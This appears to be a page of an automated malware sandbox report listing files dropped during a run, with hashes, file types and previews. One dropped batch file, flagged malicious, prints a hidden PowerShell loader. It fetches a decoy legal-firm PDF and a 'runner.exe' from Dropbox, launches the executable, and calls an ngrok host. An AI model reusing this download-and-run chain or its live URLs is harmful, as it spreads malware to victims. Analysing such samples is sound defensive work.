                                                                                                                                                                                                                                                                                  SHA-256:D6C8E2EF650282C5B78D4CB89DE7FA47D0AC7A3818250101A2418B793D7C4BBA
                                                                                                                                                                                                                                                                                  SHA-512:B552E36B17A92C584B269C73A9888AC67D19C28326EF39B7F1611CB6756B112BD113A9815EAB3BC6B51A6DBEFE4680C7532DD5D4F4102791BBB2021E4DDD8E54
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:PSMODULECACHE.\...I.\.%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):64
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.1510207563435464
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:NlllulPki/llllZ:NllUcylll
                                                                                                                                                                                                                                                                                  MD5:D8D47FD6FA3E199E4AFF68B91F1D04A8
                                                                                                                                                                                                                                                                                  SHA1:788625E414B030E5174C5BE7262A4C93502C2C21
                                                                                                                                                                                                                                                                                  SHA-256:2D9AF9AB25D04D1CF9B25DB196A988CD6E4124C1B8E185B96F2AB9554F4A6738
                                                                                                                                                                                                                                                                                  SHA-512:5BFD83D07DC3CB53563F215BE1D4D7206340A4C0AB06988697637C402793146D13CDDE0E27DC8301E4506553D957876AC9D7A7BF3C7431BBDD5F019C17AB0A58
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:@...e.................................^..............@..........

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1027599800.pdf

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  File Type:PDF document, version 1.7, 2 pages
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):106848
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.916846950395155
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:/t7dsAjcYfnYKHqU4UDgCWuJhG/oEMKTKipqgdrP9sW32prNybV0MLQF2C/hy1T:lGY1YUPDgK6TlrPTsSVC/h8
                                                                                                                                                                                                                                                                                  MD5:14E5098503C76B02728CDE6EA96538C3
                                                                                                                                                                                                                                                                                  SHA1:88B84351C73D8E918BEA3DD7EB2178B9C466A342
                                                                                                                                                                                                                                                                                  SHA-256:7519554506D088A93C531F74F055E8966215CCC42C647382F6A95705172DCAFF
                                                                                                                                                                                                                                                                                  SHA-512:F8A88B3E86503F4422F599A279EBC8C9F3B552AC3F7495C92780FFE2B406FD1F2F855F0B47D1D0F543E058E90E7146A54ABF86B611FE4F071F46ECE6927D6087
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 25 0 R/MarkInfo<</Marked true>>/Metadata 85 0 R/ViewerPreferences 86 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 2/Kids[ 3 0 R 20 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 9 0 R/F3 11 0 R/F4 16 0 R>>/ExtGState<</GS7 7 0 R/GS8 8 0 R>>/XObject<</Image18 18 0 R/Image19 19 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 612 792] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 2726>>..stream..x..[Y..F.~.`.C.EZH4....0G.8k....Y`.....0.H..g'.~..I.C.Wk..G..&....l.7..`WWo...g..wI.`...~z.__...;.....|./..,..0..../~..+./n?^^...3..q~y.a..8S".4g..=.wV0..-jx![.......Fl.o......u...`?..cl. w.0../...T..pup..b....9...x.F.r<.......Q._.........%^...G.Y`1GR.....C)7.X...j..X..f.8.e2......4.Uy.C...c<...L@S.+..,&.01........#.....0...q...Pz.......G..#.......+.p..."..K8..B....

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1462386273.bat

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  File Type:DOS batch file, ASCII text, with very long lines (566), with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):626
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.644927351164377
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:0G81kFX0b11JkdhdEBfH1MRdEFvtyJkP1i3sQBvg2WEo721:0GpObJQEF+YCJaf2WEou
                                                                                                                                                                                                                                                                                  MD5:028FD1C39D3EDF59E76E41CBBB848C3E
                                                                                                                                                                                                                                                                                  SHA1:3AFAEEE8B81DD95405D227B166C7A83BD3DB4E2C
                                                                                                                                                                                                                                                                                  SHA-256:11E04A85AC78FAACE8EE9353B2F5343C23BAB9FAD0A3994D34F91D3BE14A97E6
                                                                                                                                                                                                                                                                                  SHA-512:7C25F92D223037230A1E93A38437D6D5405796C3744C4B18640363DF133BEE7F0AE186C357FF2F6C6B660D71E9EAAD6B84AA969556F80828DD7165F8B8D65A25
                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                  Preview:@echo off..powershell -WindowStyle Hidden -Command ^.. "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE; IWR -Uri 'https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/metadata/3280fc306b2b1b17d755c31452bd62f7'; "..exit

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1738ad1c-db3e-4ffc-b5c9-dd37ff4fabca.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):138356
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.809609231921042
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                                                                                                                                  MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                                                                                                                                  SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                                                                                                                                  SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                                                                                                                                  SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....|..F....|....V....w.%t.y..?..&..a..<.n....S+|..=.ra.....

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\2c9ca1f8-8a0b-4515-807a-0e5be1ad5a55.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\40fb1150-2df2-44ca-aabc-43342441d56d.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):206855
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.983991878155761
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEIx:l81Lel7E6lEMVo/S01fDpWmEgr
                                                                                                                                                                                                                                                                                  MD5:03E0A41C7EF64C946D818C2F5E4B7EC3
                                                                                                                                                                                                                                                                                  SHA1:B3FEB76961D6A54EB9566EAC7E688BC55394B672
                                                                                                                                                                                                                                                                                  SHA-256:CA2E03394F3B161D3A1E25F6A77B28EFDAB1D7989A0A1C2B6FC1764D8C27B7C7
                                                                                                                                                                                                                                                                                  SHA-512:3F775790206CADE3A9CFBDCC3C081611330D525222D43085749A98D975B779109DF305799C53386E4B251D1D892735F5B4B31E6CD95475D0606BDD13BDB24001
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\50dd83a7-fea3-44a0-afbd-91f0c7cf1c39.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\7ae230fa-ec1e-4b12-b883-fc5966dc697d.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:PNG image data, 204 x 264, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):437259
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.998726360451669
                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                  SSDEEP:12288:KhTi9JPNfgBTIxXL2v6YRl5JCqqpRFW0X2yk:is1IBTI9LkhSqqQ0Xq
                                                                                                                                                                                                                                                                                  MD5:4B7767FA72167423F71E98AE4633E43A
                                                                                                                                                                                                                                                                                  SHA1:D71092D94EAC383161F072A659558FCF6C9074D5
                                                                                                                                                                                                                                                                                  SHA-256:F8C25539693DCCF13761F8EBFABACF2BA95DCA3C1807F35074F5247F00927B46
                                                                                                                                                                                                                                                                                  SHA-512:6E72EFE5C92C685C4EA011D39982C0D5F86DFA1239C0891EA7E5FF8D6FD5BD04C07C1484B54FA7F35DAD99FB208BD27C8BC66832E6FAB59D8DE2BB9576BC4FE8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR..............,......sRGB....... .IDATx^....]U.?.].TF2A.@....qB.I.AD...Ah..].C..qi.C...h.lD..$....83(((8..*".)..yN..}n...x....!u.Z...s.......OGOOOO..P.P._..(....J.B....0....Z.@.L..*E...`.....@.....U.......(.h...0-...-.(.)<P(....`Z V)Z(P.Sx.P......@.R.P....@.@..(.i.X.h.@.L.B..(P....J.B.......-P....b.....0....Z.@.L..*E...`.....@.....U.......(.h...0-...-..V..^.0.?tV,_xyl1.<....3..R........:.|!.....^.H..|@.Zz]...kL..1y...c..aC...K.a....8"V..NDt.'~!...1..7......)...3....2.aC.!.Lw...m#.....?.Sf.%:::..{U...X6...7......U...P`()0d..R:/.....-..}...gb..GO....Y..c&FGt...1./.Nl....{Lg..6..*m.r...`z~pf.O..7-....X8..1..)1s...........K...p..O.w}L..=.._...n.{m././..SW.?...t.T;...G..#.yC.n.m...+.Y.S.D.w...G.G\yG..5.1y..8._..W.*..e.4.U......z.6G9...0..F|....."...b..q.W......,._.......u:......;.q....;.].+...c.....1v.M..#o......uwwWc.O..G.......U.w.-......Y.O>.<cF...+.{.|E.......1kV...F...8nZ...V....{.|...m.{o1;f...c;..J....o...'...'....

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\854113748.exe

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1843712
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.178746640907945
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:49152:jgroExwGqf9gSdRye+kwlwW5maKlkvKNeEK4V0:sroExTk9gSdkt
                                                                                                                                                                                                                                                                                  MD5:EB40135D3E0FE985A9E09970DC09A499
                                                                                                                                                                                                                                                                                  SHA1:8AF34D2B5006683471BF521745FC08F75E25F5A5
                                                                                                                                                                                                                                                                                  SHA-256:AA0DE67AABBC67EFFDEEF899E9B68E072AA927BFEC1D95202740702615FE06F6
                                                                                                                                                                                                                                                                                  SHA-512:BE9D06812BDF15374EBA53053CE3BF3BE98FA26DC6F0C7361F0458ECAFBE03ABB7840C3A0995843D2CB31316CDDACF74ABD992952F7C9957E83A4455D71FD592
                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                                                  • Filename: qxjDerXRGR.lnk, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t...0..0..0......1......3......*....].3....^.=....H.%....O.?....X.'..0.......A......_.1....Z.1..Rich0..................PE..L......e.....................v.......4............@..........................P.......f....@..................................+..........$................S...p.........................................@...............p............................text............................... ..`.rdata..............................@..@.data....0...`.......H..............@....rsrc...$............d..............@..@........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2bgnbkjd.jlf.psm1

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a5zwq1sn.nlc.ps1

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f3ugx22v.zy5.psm1

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nd5bi5pb.tas.ps1

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nsckxhpg.rt2.ps1

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vp0pi5xt.rpv.psm1

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):353
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.378684220749841
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:YEemM7i56s/uemMNo9hU1xJPxQJjDrwv/uhx7KIQo56s/C:Y/7i56s/lNorU1PPx0Dkv/CxOI/56s/C
                                                                                                                                                                                                                                                                                  MD5:5FC62B62EED49798F01AD5017B0DC6CF
                                                                                                                                                                                                                                                                                  SHA1:DC4DB36F0CE4014B1F9EAE96F9A27C24889BAFB7
                                                                                                                                                                                                                                                                                  SHA-256:CE8424EDEDE6DA3DE965C112A59C8C7B823B13785966F5962EDB7E3072D40BDB
                                                                                                                                                                                                                                                                                  SHA-512:D04A13958599F86DF73CB7EA5D82A0F2CDCB460D5097251C34747E12E68698BF3840795CF480B748275D2A2687900F1E86D3144EBA609ACCB431552940F28E4D
                                                                                                                                                                                                                                                                                  Malicious:false
